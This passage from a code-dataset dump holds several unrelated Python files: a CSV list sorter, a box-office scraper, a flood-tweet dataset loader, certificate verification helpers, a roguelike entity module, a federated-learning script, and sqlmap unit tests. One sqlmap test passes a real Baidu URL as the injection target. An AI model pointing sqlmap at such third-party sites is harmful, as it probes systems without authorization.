line.replace('\\'\\'','\\'')\r\n line = line.replace('&','&')\r\n if line[0:9] != '\"\",\"\",\"\",':\r\n #print(line[1:-2])\r\n data = line[1:-2].split('\",\"')\r\n title = data[0]\r\n album = data[1]\r\n performer = data[2]\r\n score = data[4]\r\n deleted = data[6]\r\n if len(deleted) == 0:\r\n aData.append([performer, album, title, score, deleted])\r\n\r\naData.sort(key=itemgetter(0,1,2))\r\n\r\nwith open(destinationFileName, 'w', encoding=\"utf-8\") as f:\r\n f.write('\\\"Performer\\\",\"Album\\\",\"Title\\\",\"Score\\\",\"Deleted\\\"\\n')\r\n for item in aData:\r\n f.write('\\\"'+item[0]+'\\\",\"'+item[1]+'\\\",\"'+item[2]+'\\\",\"'+item[3]+'\\\",\"'+item[4]+'\\\"\\n')\r\n","sub_path":"make_list.py","file_name":"make_list.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277001016","text":"import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport glob,os,math,time\r\n\r\n\r\ndef left_time_estimation(round_time,remain_workload):\r\n left_time = remain_workload * round_time\r\n if left_time < 3600:\r\n time_estimation = str(math.modf(left_time/60)[1])\r\n seconds = str(round(math.modf(math.modf(left_time/60)[0])[0]*60,3))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 3600 and left_time < 86400:\r\n time_estimation = str(math.modf(left_time/60/60)[1])\r\n mins = str(math.modf(math.modf(left_time/60/60)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(left_time/60/60)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 86400 and left_time < 172800:\r\n time_estimation = str(math.modf(left_time/60/60/24)[1])\r\n 
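# math.modf(x) returns (fractional part, integer part); the fractional remainders cascade into hours, minutes and seconds\r\n        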
hours = str(math.modf(math.modf(left_time/60/60/24)[0]*24)[1])\r\n mins = str(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] day ' + '[ ' + hours + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n elif left_time >= 172800:\r\n time_estimation = str(math.modf(left_time/60/60/24)[1])\r\n hours = str(math.modf(math.modf(left_time/60/60/24)[0]*24)[1])\r\n mins = str(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[1])\r\n seconds = str(round(math.modf(math.modf(math.modf(left_time/60/60/24)[0]*24)[0]*60)[0]*60,2))\r\n print('\\nThis parsing section will be finished in [ ' + time_estimation + ' ] days ' + '[ ' + hours + ' ] hours [ ' + mins + ' ] minutes [ ' + seconds + ' ] seconds...(2/6)')\r\n\r\n\r\ndef parsing_each_day_link():\r\n\r\n assert str(os.listdir('box_office_pages')) != '[]', \\\r\n \"You should download each year's page first!\\n\\nCheck if you have run [ web_scrapping.py ]\"\r\n\r\n link_data = pd.DataFrame()\r\n\r\n for one_file in glob.glob('box_office_pages/*.html'):\r\n loads = [file for file in glob.glob('box_office_pages/*.html')]\r\n position = loads.index(one_file)\r\n remain_workload = len(loads) - position\r\n round_s_time = time.time()\r\n\r\n f = open(one_file,'r',encoding = 'utf-8')\r\n html = f.read()\r\n f.close()\r\n soup = BeautifulSoup(html,'html.parser')\r\n tds = soup.find_all('td', class_='a-text-left mojo-header-column mojo-truncate mojo-field-type-date_interval mojo-sort-column')\r\n for item in tds:\r\n date_link = item.find('a').get('href')\r\n full_link = 'https://www.boxofficemojo.com/' + date_link\r\n date = item.find('a').get_text()\r\n link_data = link_data.append({\r\n 'Dates':date,\r\n 'Links':full_link\r\n },ignore_index = True)\r\n\r\n round_e_time = time.time()\r\n round_time = round_e_time - round_s_time\r\n left_time_estimation(round_time, remain_workload=remain_workload)\r\n\r\n order = ['Dates','Links']\r\n link_data = link_data[order]\r\n print(link_data)\r\n link_data.to_csv('date_links.csv')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parsing_each_day_link()","sub_path":"Midterm_Project/official_version_for WINDOWS/parsing_each_day_link.py","file_name":"parsing_each_day_link.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645358149","text":"# coding=utf-8\n# This script is finished following HF's datasets' template:\n# https://github.com/huggingface/datasets/blob/master/templates/new_dataset_script.py\n# More examples as references to write a customized dataset can be found here:\n# https://github.com/huggingface/datasets/tree/master/datasets\n\nfrom __future__ import absolute_import, division, print_function\nimport json\nimport os\n\nimport datasets\n\n_CITATION = \"\"\"\\\n\n\"\"\"\n_DESCRIPTION = \"\"\"\\\n\"\"\"\n\nfrom ptt.utils import LOCAL_DATA_LOAD_DIR\n\n_TRAIN_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_train_new.json\"\n_VAL_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_dev_new.json\"\n_TEST_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_test_new.json\"\n\nNORMAL_LABELS_MAP = {\"relevant\": 'relevant', \"not_relevant\": 'not relevant'}\nLABELS_MAP = 
{\"relevant\": 'yes', \"not_relevant\": 'no'}\n# QUESTION = \"Is this message relevant to Queensland Floods?\"\n\nclass QueenslandFloodsConfig(datasets.BuilderConfig):\n def __init__(\n self,\n **kwargs,\n ):\n super(QueenslandFloodsConfig, self).__init__(version=datasets.Version(\"0.0.0\", \"\"), **kwargs)\n\n\nclass QueenslandFloods(datasets.GeneratorBasedBuilder):\n BUILDER_CONFIGS = [\n QueenslandFloodsConfig(\n name=\"normal\",\n description=\"text as the source and sentiment label as the target\",\n ),\n QueenslandFloodsConfig(\n name=\"t2t\",\n description=\"target is the sentiment label and source is constructed by a multi-choice QA template: context: ... question: ... choices: \",\n )\n ]\n\n \"\"\"customize dataset.\"\"\"\n\n # VERSION = datasets.Version(\"0.0.0\")\n def _info(self):\n data_info = datasets.DatasetInfo(\n description=_DESCRIPTION,\n features=datasets.Features(\n {\n \"event_name\": datasets.Value(\"string\"),\n \"set_name\": datasets.Value(\"string\"),\n \"question_template\": datasets.Value(\"string\"),\n \"question\": datasets.Value(\"string\"),\n \"text\": datasets.Value(\"string\"),\n \"source\": datasets.Value(\"string\"),\n \"target\": datasets.Value(\"string\"),\n }\n ),\n supervised_keys=None,\n homepage=\"#\",\n citation=_CITATION,\n )\n return data_info\n\n def _split_generators(self, dl_manager):\n if not self.config.data_files:\n train_path = dl_manager.download_and_extract(_TRAIN_DOWNLOAD_URL)\n val_path = dl_manager.download_and_extract(_VAL_DOWNLOAD_URL)\n test_path = dl_manager.download_and_extract(_TEST_DOWNLOAD_URL)\n\n return [\n datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": train_path}),\n datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"filepath\": val_path}),\n datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"filepath\": test_path}),\n\n ]\n else:\n splits = []\n train_path = dl_manager.download_and_extract(self.config.data_files[\"train\"])\n splits.append(datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": train_path}))\n if \"validation\" in self.config.data_files:\n if os.path.isfile(self.config.data_files[\"validation\"]):\n val_path = dl_manager.download_and_extract(self.config.data_files[\"validation\"])\n splits.append(\n datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"filepath\": val_path}))\n if \"test\" in self.config.data_files:\n if os.path.isfile(self.config.data_files[\"test\"]):\n test_path = dl_manager.download_and_extract(self.config.data_files[\"test\"])\n splits.append(datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"filepath\": test_path}))\n return splits\n\n def _generate_examples(self, filepath):\n with open(filepath, encoding='utf-8') as f:\n for id_, row in enumerate(f):\n data = json.loads(row)\n if self.config.name == \"normal\":\n yield id_, {\n \"event_name\": data[\"event_name\"],\n \"set_name\": data[\"set_name\"],\n \"question_template\": data[\"question_template\"],\n \"question\": data[\"question\"],\n \"text\": data[\"text\"],\n \"source\": data[\"text\"],\n \"target\": LABELS_MAP[data[\"label\"]],\n }\n else:\n yield id_, {\n \"event_name\": data[\"event_name\"],\n \"set_name\": data[\"set_name\"],\n \"question_template\": data[\"question_template\"],\n \"question\": data[\"question\"],\n \"text\": data[\"text\"],\n \"source\": data[\"source\"],\n \"target\": data[\"target\"],\n 
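# in the t2t config, source and target arrive pre-templated in the JSON record\n                        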
}\n","sub_path":"data_scripts/queensland_floods.py","file_name":"queensland_floods.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"42245308","text":"\nimport time\nfrom dateutil import parser\nfrom OpenSSL import crypto\n\ndef verify_chain_of_trust(trusted_cert, root_certs):\n\n    # Create and fill a X509Store with trusted certs\n    store = crypto.X509Store()\n\n    #for cert in root_certs:\n    cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, root_certs)\n    store.add_cert(cert_obj)\n\n    # Create a X509StoreContext with the cert and trusted certs\n    # and verify the chain of trust\n    store_ctx = crypto.X509StoreContext(store, crypto.load_certificate(crypto.FILETYPE_PEM, trusted_cert))\n\n    result = store_ctx.verify_certificate()\n\n    if result is None:\n        return True\n    \n    return False\n\ndef get_certificate_info(cert_file):\n\n    cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_file)\n    cert_issue = cert.get_issuer()\n\n    print (\"Certificate version: \", cert.get_version() + 1)\n    \n    print (\"Certificate serial number: \", hex(cert.get_serial_number()))\n    \n    print (\"Certificate algorithm: \", cert.get_signature_algorithm().decode(\"UTF-8\"))\n    \n    print (\"issuer: \", cert_issue.commonName)\n    \n    datetime_struct = parser.parse(cert.get_notBefore().decode(\"UTF-8\"))\n    \n    print (\"issue time: \",datetime_struct.strftime('%Y-%m-%d %H:%M:%S'))\n    \n    datetime_struct = parser.parse(cert.get_notAfter().decode(\"UTF-8\"))\n    \n    print (\"exp time: \", datetime_struct.strftime('%Y-%m-%d %H:%M:%S'))\n    \n    print (\"expired: \", cert.has_expired())\n    \n    print(\"public key length: \", cert.get_pubkey().bits())\n    \n    print(\"public key: \\n\" , crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey()).decode(\"utf-8\"))\n    \n    print(\"Message main:\")\n    \n    print(\"CN : Common Name              OU : organization unit\")\n    print(\"O  : organization             L  : geolocation\")\n    print(\"S  : state                    C  : country\")\n    \n    for item in cert_issue.get_components():\n        print(item[0].decode(\"utf-8\"), \" —— \",item[1].decode(\"utf-8\"))\n    \n    print(cert.get_extension_count())\n\ndef load_cert_file_stream(cert_file):\n\n    with open(cert_file) as cert_file_handler:\n        return cert_file_handler.read()\n\ndef get_public_key_from_certificate(cert_file):\n\n    stream = load_cert_file_stream(cert_file)\n    \n    cert = crypto.load_certificate(crypto.FILETYPE_PEM, stream)\n    \n    # dump the PKey object to PEM before decoding; PKey itself has no decode()\n    return crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey()).decode(\"utf-8\")\n\ndef test_verify():\n\n    try: \n        cert_path = '../cert/rootcert_nopassword/'\n        yuxin_cert_file = 'yuxin.com.crt'\n        root_cert_file = 'rootCA.crt'\n\n        with open(cert_path + yuxin_cert_file, 'r') as cert_file:\n            cert = cert_file.read()\n            get_certificate_info(cert)\n\n        with open(cert_path + root_cert_file, 'r') as rootcert_file:\n            root_cert = rootcert_file.read()\n            get_certificate_info(root_cert)\n\n        if verify_chain_of_trust(cert, root_cert):\n            print(\"Verified the root certificate \")\n\n        \n    except:\n        print(\"Except happened\")\n\n\nclass CertUtil(object):\n    \n    root_certs = None\n    store = None\n    cert_type = {\"ASN1\": crypto.FILETYPE_ASN1, \"PEM\": crypto.FILETYPE_PEM}\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def verify_certificate_sign_by_root(data, type = \"ASN1\"):\n\n        # bail out if the type is unknown or no root certificate has been imported\n        if type not in CertUtil.cert_type or not CertUtil.root_certs:\n            return False\n\n        #store = crypto.X509Store()\n        #store.add_cert(CertUtil.root_certs)\n\n        store_ctx = crypto.X509StoreContext(CertUtil.store, crypto.load_certificate(CertUtil.cert_type[type], data))\n\n        # return 
(False, True)[store_ctx.verify_certificate() is None]\n return True if store_ctx.verify_certificate() is None else False\n\n @staticmethod\n def extract_public_key_from_certificate(data, type=\"ASN1\"):\n \"\"\"\n extract public key from certificate, pem and der fromat\n \"\"\"\n if type not in CertUtil.cert_type:\n return None\n\n cert = crypto.load_certificate(CertUtil.cert_type[type], data)\n return cert.get_pubkey().to_cryptography_key()\n\n @staticmethod\n def import_eaadevice_rootcert(data, type = \"ASN1\"):\n \n if type not in CertUtil.cert_type:\n return False\n\n CertUtil.root_certs = crypto.load_certificate(CertUtil.cert_type[type], data)\n CertUtil.store = crypto.X509Store()\n CertUtil.store.add_cert(CertUtil.root_certs)\n return True\n\nif __name__ == \"__main__\":\n\n # test_verify()\n\n cert_path = '../cert/rootcert_nopassword/'\n yuxin_cert_file = 'yuxin.com.crt'\n root_cert_file = 'rootCA.crt'\n\n with open(cert_path + root_cert_file, 'r') as rootcert_file:\n root_cert = rootcert_file.read()\n get_certificate_info(root_cert) \n\n CertUtil.import_eaadevice_rootcert(root_cert, \"PEM\")\n\n with open(cert_path + yuxin_cert_file, 'r') as cert_file:\n cert = cert_file.read()\n get_certificate_info(cert)\n\n res = CertUtil.verify_certificate_sign_by_root(cert, \"PEM\")\n\n print(\"res = \", res)","sub_path":"Python35/App/HandleJWT/cert_pyopenssl.py","file_name":"cert_pyopenssl.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358024578","text":"from __future__ import annotations\n\nimport copy, math\nfrom typing import Optional, Tuple, Type, TypeVar, TYPE_CHECKING\n\nfrom render_order import RenderOrder\nimport tcod\nimport numpy as np\n\nif TYPE_CHECKING:\n from components.ai import BaseAI\n from components.fighter import Fighter\n from game_map import GameMap\n\nT = TypeVar(\"T\", bound=\"Entity\")\n\nfrom enum import auto, Enum\nclass Facing(Enum):\n NW = auto()\n N = auto()\n NE = auto()\n E = auto()\n SE = auto()\n S = auto()\n SW = auto()\n W = auto()\n\n @classmethod\n def get_pos(cls, f: Facing):\n map = {Facing.NW: (-1, -1), Facing.N: (0, -1), Facing.NE: (1, -1), Facing.E: (1, 0), Facing.SE: (1, 1), Facing.S: (0, 1), Facing.SW: (-1,1), Facing.W: (-1, 0)}\n return map[f]\n\n @classmethod\n def get_angle(cls, f: Facing):\n pos = cls.get_pos(f)\n return math.atan2(pos[0], pos[1])\n\n @classmethod\n def get_direction(cls,\n x1:int, y1:int,\n x2:int = 0, y2:int = 0):\n\n dx = x2-x1\n dy = y2-y1\n\n # this angle is in radians\n # 0 = up, 1=right\n angle = math.atan2(dy, dx)\n\n # i want to map this down to 0/1/-1 on two axes.\n # or maybe I'm just weak and do the map version.\n # these = are a little shaky and I'm not sure they're mutually exclusive\n if angle <= math.pi/8 and angle > -math.pi/8:\n return Facing.E\n elif angle <= 3*math.pi/8 and angle > math.pi/8:\n return Facing.SE\n elif angle <= 5*math.pi/8 and angle > 3*math.pi/8:\n return Facing.S\n elif angle <= 7*math.pi/8 and angle > 5*math.pi/8:\n return Facing.SW\n elif angle >= 7*math.pi/8 or angle < -7*math.pi/8:\n return Facing.W\n elif angle >= -3*math.pi/8 and angle < -math.pi/8:\n return Facing.NE\n elif angle >= -5*math.pi/8 and angle < -3*math.pi/8:\n return Facing.N\n elif angle >= -7*math.pi/8 and angle < -5*math.pi/8:\n return Facing.NW\n\n\n\nclass Entity:\n \"\"\"\n A generic object to represent players, enemies, items, etc.\n \"\"\"\n\n gamemap: GameMap\n\n def __init__(\n self,\n gamemap: 
Optional[GameMap] = None,\n x: int = 0,\n y: int = 0,\n facing: Facing = Facing.N,\n char: str = \"?\",\n color: Tuple[int, int, int] = (255, 255, 255),\n name: str = \"\",\n blocks_movement: bool = False,\n render_order: RenderOrder = RenderOrder.CORPSE,\n ):\n self.x = x\n self.y = y\n self.facing = facing\n self.char = char\n self.color = color\n self.name = name\n self.blocks_movement = blocks_movement\n self.render_order = render_order\n if gamemap:\n # If gamemap isn't provided now then it will be set later.\n self.gamemap = gamemap\n gamemap.entities.add(self)\n\n def __str__(self):\n return f'({self.name}: ({self.x}, {self.y}):{self.facing})'\n\n def spawn(self: T, gamemap: GameMap, x: int, y: int) -> T:\n \"\"\"Spawn a copy of this instance at the given location.\"\"\"\n clone = copy.deepcopy(self)\n clone.x = x\n clone.y = y\n clone.gamemap = gamemap\n gamemap.entities.add(clone)\n return clone\n\n def place(self, x: int, y: int, gamemap: Optional[GameMap] = None) -> None:\n \"\"\"Place this entitiy at a new location. Handles moving across GameMaps.\"\"\"\n self.x = x\n self.y = y\n if gamemap:\n if hasattr(self, \"gamemap\"): # Possibly uninitialized.\n self.gamemap.entities.remove(self)\n self.gamemap = gamemap\n gamemap.entities.add(self)\n\n def move(self, dx: int, dy: int) -> None:\n # Move the entity by a given amount\n self.x += dx\n self.y += dy\n\n\nclass Actor(Entity):\n def __init__(\n self,\n *,\n x: int = 0,\n y: int = 0,\n char: str = \"?\",\n color: Tuple[int, int, int] = (255, 255, 255),\n name: str = \"\",\n ai_cls: Type[BaseAI],\n fighter: Fighter,\n ):\n super().__init__(\n x=x,\n y=y,\n char=char,\n color=color,\n name=name,\n blocks_movement=True,\n render_order=RenderOrder.ACTOR,\n )\n\n self.ai: Optional[BaseAI] = ai_cls(self)\n\n self.is_player = False\n\n self.fighter = fighter\n self.fighter.entity = self\n\n # abstract into a hostile class? PC can't have a target lock i think?\n self.target_lock = None\n\n def get_visibility(self, tiles):\n visibility = tcod.map.compute_fov(\n tiles, (self.x, self.y), algorithm=1, radius=24)\n\n # now, whack it with a facing mask.\n # my meh idea for this is raytracing.\n\n # I think there's a one command way to do this but i'm lazy\n mask = np.full(tiles.shape, False)\n facing_angle = Facing.get_angle(self.facing)\n\n # I feel like there's a clever list comprehension here but...\n # ths is expensive. we only want to consider True values here\n # but I don't know how to back out from a tile to its coordinates.\n # this makes make think that ultimately tiles need unique ids not just be naked booleans?\n for x in range(0, visibility.shape[0]):\n for y in range(0, visibility.shape[1]):\n\n visible = visibility[x][y]\n if not visible:\n continue\n\n # first, compute the distance to the entity.\n # then compute the angle.\n # then set true/false based on the acceptable range for that angle.\n\n # could do this fancy with pathfinder/djikstra but fuck it, pythagoras had this worked out fine.\n distance = int(math.sqrt(math.pow(self.x-x, 2) + math.pow(self.y-y, 2)))\n\n angle = math.atan2(self.x-x, self.y-y) + math.pi\n angle_distance = min(abs(angle-facing_angle),\n 2*math.pi - (angle-facing_angle))\n\n if(angle_distance < math.pi/4):\n r = 24\n elif(angle_distance < math.pi/2):\n r = 6\n else:\n r = 2\n\n # flip it to False if it's out of range for the angle.\n if distance > r:\n visibility[x][y] = False\n\n return visibility\n\n # this is an odd way to do this. 
probably fine, but this was the side-effecting problem with setting AI to null.\n @property\n def is_alive(self) -> bool:\n \"\"\"Returns True as long as this actor can perform actions.\"\"\"\n return bool(self.ai)\n","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"446166911","text":"import torch\r\nimport numpy as np\r\nfrom nn_utils import DataGenerator, save_model\r\nfrom nn_models import BiLSTMModel\r\nimport os\r\nimport argparse\r\nimport time\r\nimport copy\r\nfrom fed_utils import LocalUpdate, FedAvg\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ntorch.manual_seed(0)\r\nnp.random.seed(0)\r\n\r\nparser = argparse.ArgumentParser(description='Code to train RNN and intepretable RNN models')\r\nparser.add_argument('--path', help='Path to dataset', type=str, required=True)\r\nparser.add_argument('--epochs', help='Number of epochs for which to train the model', type=int, default=10)\r\nparser.add_argument('--lr', help='Learning rate', type=float, default=1e-3)\r\nparser.add_argument('--reverse_input', help='Flag to reverse input', action='store_true')\r\nparser.add_argument('--no_cuda', dest='use_cuda', help='Flag to not use CUDA', action='store_false')\r\nparser.set_defaults(use_cuda=True)\r\nargs = parser.parse_args(['--path', 'mini_eicu_features.csv'])\r\nassert os.path.exists(args.path), 'Path to dataset does not exist'\r\n\r\nargs.batch_size = 1\r\nembedding_size = 40\r\nhidden_size = 40\r\n\r\npath1 = 'mini_eicu_features_weight_1.csv'\r\npath2 = 'mini_eicu_features_weight_2.csv'\r\npath3 = 'mini_eicu_features_weight_3.csv'\r\npath4 = 'mini_eicu_features_weight_4.csv'\r\npath5 = 'mini_eicu_features_weight_5.csv'\r\ndata_generator1 = DataGenerator(path1, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator2 = DataGenerator(path2, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator3 = DataGenerator(path3, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator4 = DataGenerator(path4, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator5 = DataGenerator(path5, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\n\r\ndata_generator = [data_generator1, data_generator2, data_generator3, data_generator4, data_generator5]\r\n\r\nmodel_glob = BiLSTMModel(21, embedding_size, hidden_size)\r\n\r\nif args.use_cuda:\r\n model_glob = model_glob.cuda()\r\n model_glob.tensors_to_cuda()\r\n\r\nmodel_glob.train()\r\nw_glob = model_glob.state_dict()\r\n\r\n# Training\r\nloss_train = []\r\nlr_base_t0 = time.time()\r\nprint(time.localtime(lr_base_t0))\r\nfor iter in range(args.epochs):\r\n loss_locals = []\r\n w_locals = []\r\n m = 2\r\n client = np.random.choice(5, m, replace=False)\r\n for idx in client:\r\n print('i = ', idx)\r\n dataset_train = data_generator[idx]\r\n local = LocalUpdate(args=args, dataset=dataset_train)\r\n w, loss = local.train(net=copy.deepcopy(model_glob))\r\n w_locals.append(copy.deepcopy(w))\r\n loss_locals.append(loss)\r\n\r\n w_glob = FedAvg(w_locals)\r\n model_glob.load_state_dict(w_glob)\r\n\r\n loss_avg = sum(loss_locals) / len(loss_locals)\r\n print('Round {:3d}, Average loss {:.3f}'.format(iter, loss_avg))\r\n loss_train.append(loss_avg)\r\n\r\nlr_base_t1 = time.time()\r\nprint(time.localtime(lr_base_t1))\r\nsave_model(model_glob, 'fedmodels', {'embedding_size': embedding_size, 'hidden_size': hidden_size, 'lr': args.lr, 'epochs': 
args.epochs, 'batch_size': args.batch_size, 'reversed': args.reverse_input})\r\n","sub_path":"federated_learning.py","file_name":"federated_learning.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181319012","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom runner.koan import *\nfrom lib.core.data import paths\nfrom lib.core.common import setPaths\nfrom sqlmap import modulePath\n\nfrom lib.core.data import cmdLineOptions\nfrom lib.parse.cmdline import cmdLineParser\nfrom lib.core.option import initOptions\n\nfrom lib.core.data import kb\nfrom lib.core.data import conf\n\nfrom lib.core.data import logger\n\n\nclass AboutData(Koan):\n\n def test_paths_setPaths(self):\n self.assertEqual({}, paths)\n paths.SQLMAP_ROOT_PATH = modulePath()\n# self.assertEqual({'SQLMAP_ROOT_PATH': u'/home/k/Develop/sqlmap'}, paths)\n setPaths()\n self.maxDiff = None\n # self.assertDictContainsSubset({'COMMON_COLUMNS': u'/home/k/Develop/sqlmap/txt/common-columns.txt',\n # 'COMMON_OUTPUTS': u'/home/k/Develop/sqlmap/txt/common-outputs.txt',\n # 'COMMON_TABLES': u'/home/k/Develop/sqlmap/txt/common-tables.txt',\n # 'ERRORS_XML': u'/home/k/Develop/sqlmap/xml/errors.xml',\n # 'GENERIC_XML': u'/home/k/Develop/sqlmap/xml/banner/generic.xml',\n # 'INJECTIONS_XML': u'/home/k/Develop/sqlmap/xml/injections.xml',\n # 'LIVE_TESTS_XML': u'/home/k/Develop/sqlmap/xml/livetests.xml',\n # 'MSSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/mssql.xml',\n # 'MYSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/mysql.xml',\n # 'ORACLE_XML': u'/home/k/Develop/sqlmap/xml/banner/oracle.xml',\n # 'OS_SHELL_HISTORY': '/home/k/.sqlmap/os.hst',\n # 'PAYLOADS_XML': u'/home/k/Develop/sqlmap/xml/payloads.xml',\n # 'PGSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/postgresql.xml',\n # 'QUERIES_XML': u'/home/k/Develop/sqlmap/xml/queries.xml',\n # 'SMALL_DICT': u'/home/k/Develop/sqlmap/txt/smalldict.txt',\n # #'SQLMAP_CONFIG': u'/home/k/Develop/sqlmap/sqlmap-dieD.conf',\n # 'SQLMAP_DUMP_PATH': u'/home/k/.sqlmap/output/%s/dump',\n # 'SQLMAP_EXTRAS_PATH': u'/home/k/Develop/sqlmap/extra',\n # 'SQLMAP_FILES_PATH': u'/home/k/.sqlmap/output/%s/files',\n # 'SQLMAP_OUTPUT_PATH': u'/home/k/.sqlmap/output',\n # 'SQLMAP_PROCS_PATH': u'/home/k/Develop/sqlmap/procs',\n # 'SQLMAP_ROOT_PATH': u'/home/k/Develop/sqlmap',\n # 'SQLMAP_SHELL_HISTORY': '/home/k/.sqlmap/sqlmap.hst',\n # 'SQLMAP_SHELL_PATH': u'/home/k/Develop/sqlmap/shell',\n # 'SQLMAP_TAMPER_PATH': u'/home/k/Develop/sqlmap/tamper',\n # 'SQLMAP_TXT_PATH': u'/home/k/Develop/sqlmap/txt',\n # 'SQLMAP_UDF_PATH': u'/home/k/Develop/sqlmap/udf',\n # 'SQLMAP_WAF_PATH': u'/home/k/Develop/sqlmap/waf',\n # 'SQLMAP_XML_BANNER_PATH': u'/home/k/Develop/sqlmap/xml/banner',\n # 'SQLMAP_XML_PATH': u'/home/k/Develop/sqlmap/xml',\n # 'SQL_KEYWORDS': u'/home/k/Develop/sqlmap/txt/keywords.txt',\n # 'SQL_SHELL_HISTORY': '/home/k/.sqlmap/sql.hst',\n # 'USER_AGENTS': u'/home/k/Develop/sqlmap/txt/user-agents.txt',\n # 'WORDLIST': u'/home/k/Develop/sqlmap/txt/wordlist.zip'}, paths)\n #self.assertEqual(u'/home/k/Develop/sqlmap/sqlmap-YplE.conf', paths.SQLMAP_CONFIG)\n import os\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n # self.assertEqual(u'/home/k/.sqlmap/output/sqlmap_profile.raw', profileOutputFile)\n paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"%s\", \"files\")\n # self.assertEqual(u'/home/k/.sqlmap/output/%s/files', paths.SQLMAP_FILES_PATH)\n\n # def 
test_cmdLineOptions_initOptions_h(self):\n # import sys\n # try:\n # sys.argv = [\"-h\"]\n # cmdLineOptions.update(cmdLineParser().__dict__)\n # initOptions(cmdLineOptions)\n # except SystemExit as e:\n # self.assertEqual(0, e[0])\n\n def test_cmdLineOptions_initOptions_xx(self):\n import sys\n self.assertEqual({}, cmdLineOptions)\n try:\n sys.argv = [\"-u\", \"https://passport.baidu.com/v2/?reg&tpl=tb&u=http://tieba.baidu.com\"]\n cmdLineOptions.update(cmdLineParser().__dict__)\n initOptions(cmdLineOptions)\n except Exception as e:\n self.assertEqual(\"unable to access item 'SQL_KEYWORDS'\", e[0])\n logger.exception(\"just test logger.exception! \")\n self.maxDiff = None\n self.assertDictEqual({'advancedHelp': None,\n 'agent': None,\n 'alert': None,\n 'answers': None,\n 'authCred': None,\n 'authPrivate': None,\n 'authType': None,\n 'batch': None,\n 'beep': None,\n 'binaryFields': None,\n 'bulkFile': None,\n 'charset': None,\n 'checkTor': None,\n 'checkWaf': None,\n 'cleanup': None,\n 'code': None,\n 'col': None,\n 'commonColumns': None,\n 'commonTables': None,\n 'configFile': None,\n 'cookie': None,\n 'cookieDel': None,\n 'cpuThrottle': None,\n 'crawlDepth': None,\n 'csvDel': None,\n 'dFile': None,\n 'data': None,\n 'db': None,\n 'dbms': None,\n 'dbmsCred': None,\n 'delay': None,\n 'dependencies': None,\n 'direct': None,\n 'disableColoring': None,\n 'dnsName': None,\n 'dropSetCookie': None,\n 'dummy': None,\n 'dumpAll': None,\n 'dumpFormat': None,\n 'dumpTable': None,\n 'dumpWhere': None,\n 'eta': None,\n 'evalCode': None,\n 'excludeCol': None,\n 'excludeSysDbs': None,\n 'extensiveFp': None,\n 'firstChar': None,\n 'flushSession': None,\n 'forceDns': None,\n 'forceSSL': None,\n 'forms': None,\n 'freshQueries': None,\n 'getAll': None,\n 'getBanner': None,\n 'getColumns': None,\n 'getComments': None,\n 'getCount': None,\n 'getCurrentDb': None,\n 'getCurrentUser': None,\n 'getDbs': None,\n 'getHostname': None,\n 'getPasswordHashes': None,\n 'getPrivileges': None,\n 'getRoles': None,\n 'getSchema': None,\n 'getTables': None,\n 'getUsers': None,\n 'googleDork': None,\n 'googlePage': None,\n 'headers': None,\n 